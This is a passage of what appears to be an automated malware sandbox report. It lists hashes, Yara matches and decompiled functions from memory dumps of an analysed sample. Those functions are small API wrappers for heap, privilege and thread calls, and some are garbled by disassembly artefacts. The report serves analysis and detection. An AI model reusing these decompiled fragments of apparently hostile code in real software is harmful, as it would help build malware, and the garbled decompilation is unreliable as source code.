                                                                                                                • Instruction ID: 2821e87a71d70474aa536ccd2bafc80443cffe0faf41e4dde29abac9512d20e2
                                                                                                                • Opcode Fuzzy Hash: ab7a4b6012675b2286e725be83680df63e73818d528fa4f997ffd63a6104b41b
                                                                                                                • Instruction Fuzzy Hash: 3390026131100403D14471A994186064005F7F1341F51D011E0404594CD95588566366
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01239780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: a033c77d1ac76c6cc0ea6b132080a66abccd233998a6ab7d95052fa0ea332273
                                                                                                                • Instruction ID: a1579f828278ce15d7ba55e88bc897f75e314defcbc6c46d825c064fbf501eb9
                                                                                                                • Opcode Fuzzy Hash: a033c77d1ac76c6cc0ea6b132080a66abccd233998a6ab7d95052fa0ea332273
                                                                                                                • Instruction Fuzzy Hash: DA90026932300403D18471A9940860A0005A7E1242F91D415A0005598CC95588696365
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01239660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 695f7d5f97a161d4110077bc23d8079d0c803ca15bf6a7d322ac791d23728a68
                                                                                                                • Instruction ID: 996f40e7d43675e6327c2b89e25d2660f9012d2d4a2eb530439d666b687ea21c
                                                                                                                • Opcode Fuzzy Hash: 695f7d5f97a161d4110077bc23d8079d0c803ca15bf6a7d322ac791d23728a68
                                                                                                                • Instruction Fuzzy Hash: 4D90027131100C03D18471A9840464A0005A7E1341F91C015A0015694DCA558A5977E5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 012396E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 9b29620a76a6058a9a41bc3191351944d37ddcfac2957146f57ca29a50197c38
                                                                                                                • Instruction ID: 6179bc8a6413ef6f0917edff5d45cfbf643be14b58295d3e72636a765ef620b0
                                                                                                                • Opcode Fuzzy Hash: 9b29620a76a6058a9a41bc3191351944d37ddcfac2957146f57ca29a50197c38
                                                                                                                • Instruction Fuzzy Hash: E490027131108C03D11461A9C40474A0005A7E0341F55C411A4414698DC6D588917265
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00409A90, Relevance: .1, Instructions: 92COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 8cbed3371a6de248c6f05f6b2f2f45dd20154b7cff5b93088a53256eec63d106
                                                                                                                • Instruction ID: c22ca3a442117fc487b34946fec9465cc1c6bc2e96afbca13853fad7931c1b5c
                                                                                                                • Opcode Fuzzy Hash: 8cbed3371a6de248c6f05f6b2f2f45dd20154b7cff5b93088a53256eec63d106
                                                                                                                • Instruction Fuzzy Hash: 3D210CB2D4020857CB25D665AD42BEF737CAF55318F04017FE949A3182F6387E49CBA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004082E8, Relevance: 1.6, APIs: 1, Instructions: 59threadwindowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 55%
                                                                                                                			E004082E8(signed int __eax, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t19;
				int _t20;
				long _t27;
				int _t32;
				void* _t35;
				void* _t37;
				void* _t42;

				asm("pushfd");
				asm("cmpsd");
				 *((char*)(_t37 + __eax * 4 - 0x43)) =  *((char*)(_t37 + __eax * 4 - 0x43)) + 1;
				asm("wait");
				asm("adc eax, 0x83ec8b55");
				_t35 = _t37;
				_v68 = 0;
				E0041BA50( &_v67, 0, 0x3f);
				E0041C5F0( &_v68, 3);
				_t19 = E0040ACD0(_t42, _a4 + 0x1c,  &_v68); // executed
				_t20 = E00414E30(_a4 + 0x1c, _t19, 0, 0, 0xc4e7b6d6);
				_t32 = _t20;
				if(_t32 != 0) {
					_t27 = _a8;
					_t20 = PostThreadMessageW(_t27, 0x111, 0, 0); // executed
					_t44 = _t20;
					if(_t20 == 0) {
						_t20 =  *_t32(_t27, 0x8003, _t35 + (E0040A460(_t44, 1, 8) & 0x000000ff) - 0x40, _t20);
					}
				}
				return _t20;
			}












                                                                                                                0x004082e8
                                                                                                                0x004082e9
                                                                                                                0x004082ea
                                                                                                                0x004082ee
                                                                                                                0x004082ef
                                                                                                                0x004082f1
                                                                                                                0x004082ff
                                                                                                                0x00408303
                                                                                                                0x0040830e
                                                                                                                0x0040831e
                                                                                                                0x0040832e
                                                                                                                0x00408333
                                                                                                                0x0040833a
                                                                                                                0x0040833d
                                                                                                                0x0040834a
                                                                                                                0x0040834c
                                                                                                                0x0040834e
                                                                                                                0x0040836b
                                                                                                                0x0040836b
                                                                                                                0x0040836d
                                                                                                                0x00408372

                                                                                                                APIs
                                                                                                                • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: MessagePostThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 1836367815-0
                                                                                                                • Opcode ID: 6f94c6a58a1282d1099b70150ad2c807de33fd4d65d58f9133d07c0709a708a9
                                                                                                                • Instruction ID: a42d6e11d8a2656051afe6cadc77a38bb76d3948990fc32dba3157685e578310
                                                                                                                • Opcode Fuzzy Hash: 6f94c6a58a1282d1099b70150ad2c807de33fd4d65d58f9133d07c0709a708a9
                                                                                                                • Instruction Fuzzy Hash: C3014C31A802287AE721A6948D43FFF771CAF80F05F04401EFF04FA1C2D6A96A0647E9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 82%
                                                                                                                			E004082F0(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041BA50( &_v67, 0, 0x3f);
				E0041C5F0( &_v68, 3);
				_t12 = E0040ACD0(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00414E30(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A460(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                                                                                                                0x004082f0
                                                                                                                0x004082ff
                                                                                                                0x00408303
                                                                                                                0x0040830e
                                                                                                                0x0040831e
                                                                                                                0x0040832e
                                                                                                                0x00408333
                                                                                                                0x0040833a
                                                                                                                0x0040833d
                                                                                                                0x0040834a
                                                                                                                0x0040834c
                                                                                                                0x0040834e
                                                                                                                0x0040836b
                                                                                                                0x0040836b
                                                                                                                0x00000000
                                                                                                                0x0040836d
                                                                                                                0x00408372

                                                                                                                APIs
                                                                                                                • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: MessagePostThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 1836367815-0
                                                                                                                • Opcode ID: 0d1e36c289a0b53bdeed0d38a9a87e480687051d7683c9869489bfd4a45d3142
                                                                                                                • Instruction ID: 1c70ebe9c4587dd2a83d5b3b8a0bede6d40f176564795ec2817d5d4d7982e3b8
                                                                                                                • Opcode Fuzzy Hash: 0d1e36c289a0b53bdeed0d38a9a87e480687051d7683c9869489bfd4a45d3142
                                                                                                                • Instruction Fuzzy Hash: AD01FC31A8032877E720A6958D03FFF771C6B40F54F04401DFF04BA1C1E6A8690546FA
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0041A3AC, Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 46%
                                                                                                                			E0041A3AC(void* __ecx, WCHAR* _a4, WCHAR* _a8, struct _LUID* _a12) {
				intOrPtr _v0;
				int _t10;
				void* _t16;

				asm("cli");
				asm("xlatb");
				asm("rcl byte [ebp-0x75], cl");
				_t7 = _v0;
				E0041AB40(_t16, _v0, _v0 + 0xc8c,  *((intOrPtr*)(_t7 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a4, _a8, _a12); // executed
				return _t10;
			}






                                                                                                                0x0041a3ac
                                                                                                                0x0041a3ae
                                                                                                                0x0041a3af
                                                                                                                0x0041a3b3
                                                                                                                0x0041a3ca
                                                                                                                0x0041a3e0
                                                                                                                0x0041a3e4

                                                                                                                APIs
                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1B2,0040F1B2,0000003C,00000000,?,00409D45), ref: 0041A3E0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: LookupPrivilegeValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 3899507212-0
                                                                                                                • Opcode ID: 6aa8a1a0eddbdd748abf7a29f480667169de18ddd140b9ce29789d84d8d5424b
                                                                                                                • Instruction ID: 50a0093dd2b6d3a697e29d991812daf9f8b34c3453e5e84667064f005861b796
                                                                                                                • Opcode Fuzzy Hash: 6aa8a1a0eddbdd748abf7a29f480667169de18ddd140b9ce29789d84d8d5424b
                                                                                                                • Instruction Fuzzy Hash: E3E092B12002047BDB20DF55CC40EDB77699F85250F008159FA0D97241C534A8108BB0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0041A250, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0041A250(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041AB40(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                                                                0x0041a25f
                                                                                                                0x0041a267
                                                                                                                0x0041a27d
                                                                                                                0x0041a281

                                                                                                                APIs
                                                                                                                • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A27D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FreeHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 3298025750-0
                                                                                                                • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                • Instruction ID: ee3aa041e972e1580d2f30967c3c9a2bcee9683d3d67cd51b15d6bd94af8f81d
                                                                                                                • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                • Instruction Fuzzy Hash: BEE046B1200208ABDB18EF99CC49EE777ADEF88760F018559FE095B242C630F910CAF0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0041A210, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0041A210(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				long _t9;
				void* _t10;
				void* _t12;
				long _t13;
				void* _t15;

				E0041AB40(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t13 = _a16;
				_t9 = _a12;
				_t12 = _a8;
				_t10 = RtlAllocateHeap(_t12, _t9, _t13); // executed
				return _t10;
			}








                                                                                                                0x0041a227
                                                                                                                0x0041a22c
                                                                                                                0x0041a22f
                                                                                                                0x0041a232
                                                                                                                0x0041a23d
                                                                                                                0x0041a241

                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(00414516,?,00414C8F,00414C8F,?,00414516,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A23D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                • Instruction ID: 447e7a220df12b1cedfda995ac5eefb5f8fdfd8f8e9865071670fb4112bd08d3
                                                                                                                • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                • Instruction Fuzzy Hash: F8E012B1200208ABDB14EF99CC41EA777ADAF88664F118559BA095B242C630F9108AB0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0041A3B0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0041A3B0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E0041AB40(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                                                                0x0041a3ca
                                                                                                                0x0041a3e0
                                                                                                                0x0041a3e4

                                                                                                                APIs
                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1B2,0040F1B2,0000003C,00000000,?,00409D45), ref: 0041A3E0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: LookupPrivilegeValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 3899507212-0
                                                                                                                • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                • Instruction ID: 59391c5e11f167e5dbe23f0656a9380a297fcfa3b65dd95ded7aab8eafd70cc2
                                                                                                                • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                • Instruction Fuzzy Hash: E3E01AB12002086BDB10DF49CC85EE777ADAF88650F018155BA0957241C934F8108BF5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0041A290, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0041A290(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E0041AB40(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                                                                                0x0041a293
                                                                                                                0x0041a2aa
                                                                                                                0x0041a2b8

                                                                                                                APIs
                                                                                                                • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A2B8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ExitProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 621844428-0
                                                                                                                • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                • Instruction ID: 0f5b6569f0fd1189fef647496f38c461ee85f3cd89d543d30868c9d99a5dee31
                                                                                                                • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                • Instruction Fuzzy Hash: A5D017726042187BD620EB99CC85FD777ACDF487A0F0180A9BA1D6B242C535BA108AE1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0041A282, Relevance: 1.5, APIs: 1, Instructions: 19memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 37%
                                                                                                                			E0041A282() {
				void* _t14;
				void* _t21;
				void* _t22;
				void* _t25;
				void* _t26;

				asm("pushad");
				asm("loop 0xffffffe9");
				asm("sahf");
				 *((intOrPtr*)(_t14 + 0x1a638af8)) =  *((intOrPtr*)(_t14 + 0x1a638af8)) + _t22;
				_pop(_t21);
				_t25 = _t26;
				_t11 =  *((intOrPtr*)(_t25 + 8));
				_push(_t22);
				E0041AB40(_t21,  *((intOrPtr*)(_t25 + 8)),  *((intOrPtr*)(_t25 + 8)) + 0xc7c,  *((intOrPtr*)(_t11 + 0xa14)), 0, 0x36);
				ExitProcess( *(_t25 + 0xc));
			}








                                                                                                                0x0041a282
                                                                                                                0x0041a285
                                                                                                                0x0041a287
                                                                                                                0x0041a289
                                                                                                                0x0041a28f
                                                                                                                0x0041a291
                                                                                                                0x0041a293
                                                                                                                0x0041a29c
                                                                                                                0x0041a2aa
                                                                                                                0x0041a2b8

                                                                                                                APIs
                                                                                                                • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A27D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FreeHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 3298025750-0
                                                                                                                • Opcode ID: 80865df76ddddb849f8c1896b1936e17afd15524ebe015052558beddeb27c303
                                                                                                                • Instruction ID: 86151cc3c2ed6c69e2a1de296f5bd485e17e5ab9ce1e70d199341d189822b8f5
                                                                                                                • Opcode Fuzzy Hash: 80865df76ddddb849f8c1896b1936e17afd15524ebe015052558beddeb27c303
                                                                                                                • Instruction Fuzzy Hash: 2AD022B12891106BE341DBA4EDC44FE7B19DF84A3533D02ABECEC8E00AC92084974780
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0041A243, Relevance: 1.5, APIs: 1, Instructions: 18memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 67%
                                                                                                                			E0041A243(long __eax, void* __edx, char _a4, void* _a8, long _a12, void* _a16) {
				intOrPtr* __esi;
				signed int __ebp;
				void* _t9;
				void* _t10;
				long _t12;

				_push(cs);
				_t12 = __edx + 1;
				asm("int1");
				if(_t12 >= 0) {
					_t9 = RtlAllocateHeap(_t10, __eax, _t12); // executed
					return _t9;
				} else {
					__esp =  *(__eax - 0x5d) * 0x27;
					asm("movsb");
					asm("aas");
					asm("stosd");
					_pop(__esp);
					__ebp = __esp;
					__eax = _a4;
					_t4 = __eax + 0xc74; // 0xc74
					__esi = _t4;
					__eax = E0041AB40(__edi, _a4, __esi,  *((intOrPtr*)(__eax + 0x10)), 0, 0x35);
					__edx = _a16;
					__eax = _a12;
					__edx =  *__esi;
					__eax = RtlFreeHeap(_a8, _a12, _a16); // executed
					__esi = __esi;
					__ebp = __ebp;
					return __eax;
				}
			}








                                                                                                                0x0041a243
                                                                                                                0x0041a244
                                                                                                                0x0041a245
                                                                                                                0x0041a246
                                                                                                                0x0041a23d
                                                                                                                0x0041a241
                                                                                                                0x0041a248
                                                                                                                0x0041a248
                                                                                                                0x0041a24c
                                                                                                                0x0041a24d
                                                                                                                0x0041a24e
                                                                                                                0x0041a24f
                                                                                                                0x0041a251
                                                                                                                0x0041a253
                                                                                                                0x0041a25f
                                                                                                                0x0041a25f
                                                                                                                0x0041a267
                                                                                                                0x0041a26c
                                                                                                                0x0041a26f
                                                                                                                0x0041a279
                                                                                                                0x0041a27d
                                                                                                                0x0041a27f
                                                                                                                0x0041a280
                                                                                                                0x0041a281
                                                                                                                0x0041a281

                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(00414516,?,00414C8F,00414C8F,?,00414516,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A23D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.372523028.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                • Opcode ID: 6bcd6b9f690a290d02cc1477972d82007d7c1926bf7f270aecbf26863e814f93
                                                                                                                • Instruction ID: da6f8feb3e03b2274c0fc1d21904efd90c13142348ae3fe7127025d88b691696
                                                                                                                • Opcode Fuzzy Hash: 6bcd6b9f690a290d02cc1477972d82007d7c1926bf7f270aecbf26863e814f93
                                                                                                                • Instruction Fuzzy Hash: 34C012710510102DD514EB5DB9428F2F35CDF9A215700DA67E44D46916D121446545F7
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0123967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: b6a1f3ec6f88aecef129afb3ce998569a4e6beecc90624c348442716edebb681
                                                                                                                • Instruction ID: 80647cf04102ed5e66e0b872366ff196614330651904b29fc17560bcf6d56efb
                                                                                                                • Opcode Fuzzy Hash: b6a1f3ec6f88aecef129afb3ce998569a4e6beecc90624c348442716edebb681
                                                                                                                • Instruction Fuzzy Hash: 57B09BB19164C5CADA15D7B44608717790477D1745F16C051D2020681B4778C0D1FAB5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Non-executed Functions

                                                                                                                Function 012AB260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 012AB2DC
                                                                                                                • The resource is owned shared by %d threads, xrefs: 012AB37E
                                                                                                                • *** Inpage error in %ws:%s, xrefs: 012AB418
                                                                                                                • a NULL pointer, xrefs: 012AB4E0
                                                                                                                • *** A stack buffer overrun occurred in %ws:%s, xrefs: 012AB2F3
                                                                                                                • *** Resource timeout (%p) in %ws:%s, xrefs: 012AB352
                                                                                                                • The instruction at %p tried to %s , xrefs: 012AB4B6
                                                                                                                • <unknown>, xrefs: 012AB27E, 012AB2D1, 012AB350, 012AB399, 012AB417, 012AB48E
                                                                                                                • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 012AB38F
                                                                                                                • *** then kb to get the faulting stack, xrefs: 012AB51C
                                                                                                                • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 012AB53F
                                                                                                                • read from, xrefs: 012AB4AD, 012AB4B2
                                                                                                                • This failed because of error %Ix., xrefs: 012AB446
                                                                                                                • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 012AB484
                                                                                                                • The resource is owned exclusively by thread %p, xrefs: 012AB374
                                                                                                                • Go determine why that thread has not released the critical section., xrefs: 012AB3C5
                                                                                                                • *** enter .cxr %p for the context, xrefs: 012AB50D
                                                                                                                • an invalid address, %p, xrefs: 012AB4CF
                                                                                                                • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 012AB47D
                                                                                                                • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 012AB476
                                                                                                                • write to, xrefs: 012AB4A6
                                                                                                                • *** An Access Violation occurred in %ws:%s, xrefs: 012AB48F
                                                                                                                • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 012AB3D6
                                                                                                                • The critical section is owned by thread %p., xrefs: 012AB3B9
                                                                                                                • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 012AB323
                                                                                                                • *** enter .exr %p for the exception record, xrefs: 012AB4F1
                                                                                                                • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 012AB314
                                                                                                                • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 012AB305
                                                                                                                • The instruction at %p referenced memory at %p., xrefs: 012AB432
                                                                                                                • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 012AB39B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                                                • API String ID: 0-108210295
                                                                                                                • Opcode ID: 2d48361231821895092abc334735bda47a80d15928898c1e2d1761b89ab22602
                                                                                                                • Instruction ID: 0ae32f17244813437fbc6a64f58901b2535922046d997e50d01e389887ea9c6a
                                                                                                                • Opcode Fuzzy Hash: 2d48361231821895092abc334735bda47a80d15928898c1e2d1761b89ab22602
                                                                                                                • Instruction Fuzzy Hash: 1E814535A21201FFDF29BB8ADC4AE7B3F66EF56B51F804048F6052B152D3A18451CBB2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 012B1C06, Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 44%
                                                                                                                			E012B1C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x11d48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E011FB150();
				} else {
					E011FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x12e589c);
				E011FB150("Heap error detected at %p (heap handle %p)\n",  *0x12e58a0);
				_t27 =  *0x12e5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M012B1E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
